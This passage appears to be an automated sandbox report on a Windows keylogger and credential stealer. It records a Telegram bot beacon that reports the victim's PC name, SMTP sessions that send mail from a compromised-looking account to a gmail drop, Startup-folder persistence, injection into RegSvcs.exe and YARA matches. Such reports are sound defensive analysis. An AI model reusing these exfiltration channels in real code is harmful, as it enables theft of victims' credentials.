                                                                                                          2025-01-10 17:47:01 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:47:01 UTC858INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:47:01 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1846010
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2Hsgx3MeNWbbZe01tB15Z7mJMWUp6ijFNb8DTDnyHgzMjP3yV4cbmNSLgpdaEWyuYmyh6s2A7%2FKuiCN%2FEUV%2BMr%2BzY7IL7%2FZcKOmUOgPaQF7wf6x7v3P7zjHxMQOl3ouc7mvRCeo"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7d67a8d8c358-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9471&min_rtt=9471&rtt_var=4735&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4234&recv_bytes=699&delivery_rate=54428&cwnd=155&unsent_bytes=0&cid=937c02f96c7f721b&ts=170&x=0"
                                                                                                          2025-01-10 17:47:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.449772149.154.167.2204434048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:47:02 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2001:51:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                          Host: api.telegram.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:47:02 UTC344INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 17:47:02 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 55
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 17:47:02 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                          SMTP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                          Jan 10, 2025 18:46:53.611176968 CET58749759178.210.170.40192.168.2.4220 mail-st-11.markum.net ESMTP MailEnable Service, Version: 10.31--10.31 ready at 01/10/25 20:46:53
                                                                                                          Jan 10, 2025 18:46:53.611437082 CET49759587192.168.2.4178.210.170.40EHLO 367706
                                                                                                          Jan 10, 2025 18:46:53.832989931 CET58749759178.210.170.40192.168.2.4250-mail-st-11.markum.net [8.46.123.189], this server offers 6 extensions
                                                                                                          250-AUTH CRAM-MD5 LOGIN
                                                                                                          250-SIZE 40960000
                                                                                                          250-HELP
                                                                                                          250-AUTH=LOGIN
                                                                                                          250-XSAVETOSENT
                                                                                                          250 X-SAVETOSENT
                                                                                                          Jan 10, 2025 18:46:53.834193945 CET49759587192.168.2.4178.210.170.40AUTH login aW5mb0BzdGFuZGFydGFzYW5zb3IuY29t
                                                                                                          Jan 10, 2025 18:46:54.063441992 CET58749759178.210.170.40192.168.2.4334 UGFzc3dvcmQ6
                                                                                                          Jan 10, 2025 18:46:54.307893991 CET58749759178.210.170.40192.168.2.4235 Authenticated
                                                                                                          Jan 10, 2025 18:46:54.308298111 CET49759587192.168.2.4178.210.170.40MAIL FROM:<info@standartasansor.com>
                                                                                                          Jan 10, 2025 18:46:54.530957937 CET58749759178.210.170.40192.168.2.4250 Requested mail action okay, completed
                                                                                                          Jan 10, 2025 18:46:54.531132936 CET49759587192.168.2.4178.210.170.40RCPT TO:<kimmayer766@gmail.com>
                                                                                                          Jan 10, 2025 18:46:54.779189110 CET58749759178.210.170.40192.168.2.4250 Requested mail action okay, completed
                                                                                                          Jan 10, 2025 18:46:54.779405117 CET49759587192.168.2.4178.210.170.40DATA
                                                                                                          Jan 10, 2025 18:46:55.030709028 CET58749759178.210.170.40192.168.2.4354 Start mail input; end with <CRLF>.<CRLF>
                                                                                                          Jan 10, 2025 18:46:55.031516075 CET49759587192.168.2.4178.210.170.40.
                                                                                                          Jan 10, 2025 18:46:55.268027067 CET58749759178.210.170.40192.168.2.4250 Requested mail action okay, completed
                                                                                                          Jan 10, 2025 18:47:08.671487093 CET58749773178.210.170.40192.168.2.4220 mail-st-11.markum.net ESMTP MailEnable Service, Version: 10.31--10.31 ready at 01/10/25 20:47:08
                                                                                                          Jan 10, 2025 18:47:08.671659946 CET49773587192.168.2.4178.210.170.40EHLO 367706
                                                                                                          Jan 10, 2025 18:47:08.930634022 CET58749773178.210.170.40192.168.2.4250-mail-st-11.markum.net [8.46.123.189], this server offers 6 extensions
                                                                                                          250-AUTH CRAM-MD5 LOGIN
                                                                                                          250-SIZE 40960000
                                                                                                          250-HELP
                                                                                                          250-AUTH=LOGIN
                                                                                                          250-XSAVETOSENT
                                                                                                          250 X-SAVETOSENT
                                                                                                          Jan 10, 2025 18:47:08.930921078 CET49773587192.168.2.4178.210.170.40AUTH login aW5mb0BzdGFuZGFydGFzYW5zb3IuY29t
                                                                                                          Jan 10, 2025 18:47:09.167845964 CET58749773178.210.170.40192.168.2.4334 UGFzc3dvcmQ6
                                                                                                          Jan 10, 2025 18:47:09.397497892 CET58749773178.210.170.40192.168.2.4235 Authenticated
                                                                                                          Jan 10, 2025 18:47:09.397691965 CET49773587192.168.2.4178.210.170.40MAIL FROM:<info@standartasansor.com>
                                                                                                          Jan 10, 2025 18:47:09.619775057 CET58749773178.210.170.40192.168.2.4250 Requested mail action okay, completed
                                                                                                          Jan 10, 2025 18:47:09.619944096 CET49773587192.168.2.4178.210.170.40RCPT TO:<kimmayer766@gmail.com>
                                                                                                          Jan 10, 2025 18:47:09.843091965 CET58749773178.210.170.40192.168.2.4250 Requested mail action okay, completed
                                                                                                          Jan 10, 2025 18:47:09.843266964 CET49773587192.168.2.4178.210.170.40DATA
                                                                                                          Jan 10, 2025 18:47:10.105071068 CET58749773178.210.170.40192.168.2.4354 Start mail input; end with <CRLF>.<CRLF>
                                                                                                          Jan 10, 2025 18:47:10.106046915 CET49773587192.168.2.4178.210.170.40.
                                                                                                          Jan 10, 2025 18:47:10.488493919 CET58749773178.210.170.40192.168.2.4250 Requested mail action okay, completed
                                                                                                          Jan 10, 2025 18:48:32.499456882 CET49759587192.168.2.4178.210.170.40QUIT
                                                                                                          Jan 10, 2025 18:48:32.721909046 CET58749759178.210.170.40192.168.2.4221 Service closing transmission channel

                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:12:46:26
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\AHSlIDftf1.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\AHSlIDftf1.exe"
                                                                                                          Imagebase:0xd50000
                                                                                                          File size:1'109'504 bytes
                                                                                                          MD5 hash:6A0297E362831D810A049E0EF860147E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:1
                                                                                                          Start time:12:46:30
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\AppData\Local\konked\Sancerre.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\AHSlIDftf1.exe"
                                                                                                          Imagebase:0x570000
                                                                                                          File size:1'109'504 bytes
                                                                                                          MD5 hash:6A0297E362831D810A049E0EF860147E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 74%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:12:46:33
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\AHSlIDftf1.exe"
                                                                                                          Imagebase:0x640000
                                                                                                          File size:45'984 bytes
                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.2974305954.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:4
                                                                                                          Start time:12:46:44
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs"
                                                                                                          Imagebase:0x7ff651f10000
                                                                                                          File size:170'496 bytes
                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:5
                                                                                                          Start time:12:46:44
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\AppData\Local\konked\Sancerre.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Local\konked\Sancerre.exe"
                                                                                                          Imagebase:0x570000
                                                                                                          File size:1'109'504 bytes
                                                                                                          MD5 hash:6A0297E362831D810A049E0EF860147E
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:8
                                                                                                          Start time:12:46:48
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Local\konked\Sancerre.exe"
                                                                                                          Imagebase:0xbf0000
                                                                                                          File size:45'984 bytes
                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2973433634.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2973433634.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:2.8%
                                                                                                            Dynamic/Decrypted Code Coverage:0.9%
                                                                                                            Signature Coverage:4.9%
                                                                                                            Total number of Nodes:1979
                                                                                                            Total number of Limit Nodes:41
                                                                                                            execution_graph 95448 d890fa 95449 d89107 95448->95449 95453 d8911f 95448->95453 95505 d7f2d9 20 API calls __dosmaperr 95449->95505 95451 d8910c 95506 d827ec 26 API calls __wsopen_s 95451->95506 95454 d8917a 95453->95454 95462 d89117 95453->95462 95507 d8fdc4 21 API calls 2 library calls 95453->95507 95468 d7d955 95454->95468 95457 d89192 95475 d88c32 95457->95475 95459 d89199 95460 d7d955 __fread_nolock 26 API calls 95459->95460 95459->95462 95461 d891c5 95460->95461 95461->95462 95463 d7d955 __fread_nolock 26 API calls 95461->95463 95464 d891d3 95463->95464 95464->95462 95465 d7d955 __fread_nolock 26 API calls 95464->95465 95466 d891e3 95465->95466 95467 d7d955 __fread_nolock 26 API calls 95466->95467 95467->95462 95469 d7d976 95468->95469 95470 d7d961 95468->95470 95469->95457 95508 d7f2d9 20 API calls __dosmaperr 95470->95508 95472 d7d966 95509 d827ec 26 API calls __wsopen_s 95472->95509 95474 d7d971 95474->95457 95476 d88c3e CallCatchBlock 95475->95476 95477 d88c5e 95476->95477 95478 d88c46 95476->95478 95479 d88d24 95477->95479 95484 d88c97 95477->95484 95576 d7f2c6 20 API calls __dosmaperr 95478->95576 95583 d7f2c6 20 API calls __dosmaperr 95479->95583 95481 d88c4b 95577 d7f2d9 20 API calls __dosmaperr 95481->95577 95486 d88cbb 95484->95486 95487 d88ca6 95484->95487 95485 d88d29 95584 d7f2d9 20 API calls __dosmaperr 95485->95584 95510 d85147 EnterCriticalSection 95486->95510 95578 d7f2c6 20 API calls __dosmaperr 95487->95578 95491 d88cb3 95585 d827ec 26 API calls __wsopen_s 95491->95585 95492 d88cab 95579 d7f2d9 20 API calls __dosmaperr 95492->95579 95493 d88cc1 95497 d88cdd 95493->95497 95498 d88cf2 95493->95498 95495 d88c53 __wsopen_s 95495->95459 95580 d7f2d9 20 API calls __dosmaperr 95497->95580 95511 d88d45 95498->95511 95501 d88ce2 95581 d7f2c6 20 API calls __dosmaperr 95501->95581 95502 d88ced 95582 d88d1c LeaveCriticalSection __wsopen_s 95502->95582 95505->95451 95506->95462 95507->95454 95508->95472 95509->95474 95510->95493 95512 d88d6f 95511->95512 95513 d88d57 95511->95513 95515 d890d9 95512->95515 95520 d88db4 95512->95520 95595 d7f2c6 20 API calls __dosmaperr 95513->95595 95617 d7f2c6 20 API calls __dosmaperr 95515->95617 95516 d88d5c 95596 d7f2d9 20 API calls __dosmaperr 95516->95596 95519 d890de 95618 d7f2d9 20 API calls __dosmaperr 95519->95618 95522 d88dbf 95520->95522 95523 d88d64 95520->95523 95527 d88def 95520->95527 95597 d7f2c6 20 API calls __dosmaperr 95522->95597 95523->95502 95524 d88dcc 95619 d827ec 26 API calls __wsopen_s 95524->95619 95526 d88dc4 95598 d7f2d9 20 API calls __dosmaperr 95526->95598 95530 d88e08 95527->95530 95531 d88e4a 95527->95531 95532 d88e2e 95527->95532 95530->95532 95536 d88e15 95530->95536 95602 d83820 21 API calls 2 library calls 95531->95602 95599 d7f2c6 20 API calls __dosmaperr 95532->95599 95535 d88e33 95600 d7f2d9 20 API calls __dosmaperr 95535->95600 95586 d8f89b 95536->95586 95537 d88e61 95603 d829c8 95537->95603 95541 d88fb3 95544 d89029 95541->95544 95548 d88fcc GetConsoleMode 95541->95548 95542 d88e3a 95601 d827ec 26 API calls __wsopen_s 95542->95601 95543 d88e6a 95546 d829c8 _free 20 API calls 95543->95546 95547 d8902d ReadFile 95544->95547 95549 d88e71 95546->95549 95550 d890a1 GetLastError 95547->95550 95551 d89047 95547->95551 95548->95544 95552 d88fdd 95548->95552 95553 d88e7b 95549->95553 95554 d88e96 95549->95554 95555 d890ae 95550->95555 95556 d89005 95550->95556 95551->95550 95557 d8901e 95551->95557 95552->95547 95558 d88fe3 ReadConsoleW 95552->95558 95609 d7f2d9 20 API calls __dosmaperr 95553->95609 95611 d89424 28 API calls __wsopen_s 95554->95611 95615 d7f2d9 20 API calls __dosmaperr 95555->95615 95573 d88e45 __fread_nolock 95556->95573 95612 d7f2a3 20 API calls 2 library calls 95556->95612 95569 d8906c 95557->95569 95570 d89083 95557->95570 95557->95573 95558->95557 95559 d88fff GetLastError 95558->95559 95559->95556 95560 d829c8 _free 20 API calls 95560->95523 95565 d88e80 95610 d7f2c6 20 API calls __dosmaperr 95565->95610 95566 d890b3 95616 d7f2c6 20 API calls __dosmaperr 95566->95616 95613 d88a61 31 API calls 4 library calls 95569->95613 95572 d8909a 95570->95572 95570->95573 95614 d888a1 29 API calls __wsopen_s 95572->95614 95573->95560 95575 d8909f 95575->95573 95576->95481 95577->95495 95578->95492 95579->95491 95580->95501 95581->95502 95582->95495 95583->95485 95584->95491 95585->95495 95587 d8f8a8 95586->95587 95588 d8f8b5 95586->95588 95620 d7f2d9 20 API calls __dosmaperr 95587->95620 95591 d8f8c1 95588->95591 95621 d7f2d9 20 API calls __dosmaperr 95588->95621 95590 d8f8ad 95590->95541 95591->95541 95593 d8f8e2 95622 d827ec 26 API calls __wsopen_s 95593->95622 95595->95516 95596->95523 95597->95526 95598->95524 95599->95535 95600->95542 95601->95573 95602->95537 95604 d829fc _free 95603->95604 95605 d829d3 RtlFreeHeap 95603->95605 95604->95543 95605->95604 95606 d829e8 95605->95606 95623 d7f2d9 20 API calls __dosmaperr 95606->95623 95608 d829ee GetLastError 95608->95604 95609->95565 95610->95573 95611->95536 95612->95573 95613->95573 95614->95575 95615->95566 95616->95573 95617->95519 95618->95524 95619->95523 95620->95590 95621->95593 95622->95590 95623->95608 95624 d52e37 95703 d5a961 95624->95703 95628 d52e6b 95722 d53a5a 95628->95722 95630 d52e7f 95729 d59cb3 95630->95729 95635 d52ead 95757 d5a8c7 95635->95757 95636 d92cb0 95777 dc2cf9 95636->95777 95638 d92cc3 95642 d92ccf 95638->95642 95803 d54f39 95638->95803 95640 d52ec3 95761 d56f88 22 API calls 95640->95761 95644 d54f39 68 API calls 95642->95644 95646 d92ce5 95644->95646 95645 d52ecf 95647 d59cb3 22 API calls 95645->95647 95809 d53084 22 API calls 95646->95809 95648 d52edc 95647->95648 95762 d5a81b 41 API calls 95648->95762 95651 d52eec 95653 d59cb3 22 API calls 95651->95653 95652 d92d02 95810 d53084 22 API calls 95652->95810 95654 d52f12 95653->95654 95763 d5a81b 41 API calls 95654->95763 95657 d92d1e 95658 d53a5a 24 API calls 95657->95658 95659 d92d44 95658->95659 95811 d53084 22 API calls 95659->95811 95660 d52f21 95663 d5a961 22 API calls 95660->95663 95662 d92d50 95664 d5a8c7 22 API calls 95662->95664 95665 d52f3f 95663->95665 95666 d92d5e 95664->95666 95764 d53084 22 API calls 95665->95764 95812 d53084 22 API calls 95666->95812 95669 d52f4b 95765 d74a28 40 API calls 3 library calls 95669->95765 95670 d92d6d 95674 d5a8c7 22 API calls 95670->95674 95672 d52f59 95672->95646 95673 d52f63 95672->95673 95766 d74a28 40 API calls 3 library calls 95673->95766 95677 d92d83 95674->95677 95676 d52f6e 95676->95652 95678 d52f78 95676->95678 95813 d53084 22 API calls 95677->95813 95767 d74a28 40 API calls 3 library calls 95678->95767 95681 d92d90 95682 d52f83 95682->95657 95683 d52f8d 95682->95683 95768 d74a28 40 API calls 3 library calls 95683->95768 95685 d52f98 95686 d52fdc 95685->95686 95769 d53084 22 API calls 95685->95769 95686->95670 95687 d52fe8 95686->95687 95687->95681 95771 d563eb 22 API calls 95687->95771 95690 d52fbf 95692 d5a8c7 22 API calls 95690->95692 95691 d52ff8 95772 d56a50 22 API calls 95691->95772 95694 d52fcd 95692->95694 95770 d53084 22 API calls 95694->95770 95695 d53006 95773 d570b0 23 API calls 95695->95773 95700 d53021 95701 d53065 95700->95701 95774 d56f88 22 API calls 95700->95774 95775 d570b0 23 API calls 95700->95775 95776 d53084 22 API calls 95700->95776 95814 d6fe0b 95703->95814 95705 d5a976 95824 d6fddb 95705->95824 95707 d52e4d 95708 d54ae3 95707->95708 95709 d54af0 __wsopen_s 95708->95709 95711 d54b22 95709->95711 95852 d56b57 95709->95852 95718 d54b58 95711->95718 95849 d54c6d 95711->95849 95713 d59cb3 22 API calls 95715 d54c52 95713->95715 95714 d59cb3 22 API calls 95714->95718 95716 d5515f 22 API calls 95715->95716 95717 d54c5e 95716->95717 95717->95628 95718->95714 95720 d54c29 95718->95720 95721 d54c6d 22 API calls 95718->95721 95864 d5515f 95718->95864 95720->95713 95720->95717 95721->95718 95881 d91f50 95722->95881 95725 d59cb3 22 API calls 95726 d53a8d 95725->95726 95883 d53aa2 95726->95883 95728 d53a97 95728->95630 95730 d59cc2 _wcslen 95729->95730 95731 d6fe0b 22 API calls 95730->95731 95732 d59cea __fread_nolock 95731->95732 95733 d6fddb 22 API calls 95732->95733 95734 d52e8c 95733->95734 95735 d54ecb 95734->95735 95903 d54e90 LoadLibraryA 95735->95903 95740 d54ef6 LoadLibraryExW 95911 d54e59 LoadLibraryA 95740->95911 95741 d93ccf 95743 d54f39 68 API calls 95741->95743 95745 d93cd6 95743->95745 95747 d54e59 3 API calls 95745->95747 95748 d93cde 95747->95748 95933 d550f5 95748->95933 95749 d54f20 95749->95748 95750 d54f2c 95749->95750 95752 d54f39 68 API calls 95750->95752 95754 d52ea5 95752->95754 95754->95635 95754->95636 95756 d93d05 95758 d5a8ea __fread_nolock 95757->95758 95759 d5a8db 95757->95759 95758->95640 95759->95758 95760 d6fe0b 22 API calls 95759->95760 95760->95758 95761->95645 95762->95651 95763->95660 95764->95669 95765->95672 95766->95676 95767->95682 95768->95685 95769->95690 95770->95686 95771->95691 95772->95695 95773->95700 95774->95700 95775->95700 95776->95700 95778 dc2d15 95777->95778 95779 d5511f 64 API calls 95778->95779 95780 dc2d29 95779->95780 96092 dc2e66 95780->96092 95783 d550f5 40 API calls 95784 dc2d56 95783->95784 95785 d550f5 40 API calls 95784->95785 95786 dc2d66 95785->95786 95787 d550f5 40 API calls 95786->95787 95788 dc2d81 95787->95788 95789 d550f5 40 API calls 95788->95789 95790 dc2d9c 95789->95790 95791 d5511f 64 API calls 95790->95791 95792 dc2db3 95791->95792 95793 d7ea0c ___std_exception_copy 21 API calls 95792->95793 95794 dc2dba 95793->95794 95795 d7ea0c ___std_exception_copy 21 API calls 95794->95795 95796 dc2dc4 95795->95796 95797 d550f5 40 API calls 95796->95797 95798 dc2dd8 95797->95798 95799 dc28fe 27 API calls 95798->95799 95800 dc2dee 95799->95800 95801 dc2d3f 95800->95801 96098 dc22ce 95800->96098 95801->95638 95804 d54f43 95803->95804 95805 d54f4a 95803->95805 95806 d7e678 67 API calls 95804->95806 95807 d54f59 95805->95807 95808 d54f6a FreeLibrary 95805->95808 95806->95805 95807->95642 95808->95807 95809->95652 95810->95657 95811->95662 95812->95670 95813->95681 95816 d6fddb 95814->95816 95817 d6fdfa 95816->95817 95819 d6fdfc 95816->95819 95834 d7ea0c 95816->95834 95841 d74ead 7 API calls 2 library calls 95816->95841 95817->95705 95823 d7066d 95819->95823 95842 d732a4 RaiseException 95819->95842 95821 d7068a 95821->95705 95843 d732a4 RaiseException 95823->95843 95826 d6fde0 95824->95826 95825 d7ea0c ___std_exception_copy 21 API calls 95825->95826 95826->95825 95827 d6fdfa 95826->95827 95831 d6fdfc 95826->95831 95846 d74ead 7 API calls 2 library calls 95826->95846 95827->95707 95829 d7066d 95848 d732a4 RaiseException 95829->95848 95831->95829 95847 d732a4 RaiseException 95831->95847 95832 d7068a 95832->95707 95836 d83820 __dosmaperr 95834->95836 95835 d8385e 95845 d7f2d9 20 API calls __dosmaperr 95835->95845 95836->95835 95838 d83849 RtlAllocateHeap 95836->95838 95844 d74ead 7 API calls 2 library calls 95836->95844 95838->95836 95839 d8385c 95838->95839 95839->95816 95841->95816 95842->95823 95843->95821 95844->95836 95845->95839 95846->95826 95847->95829 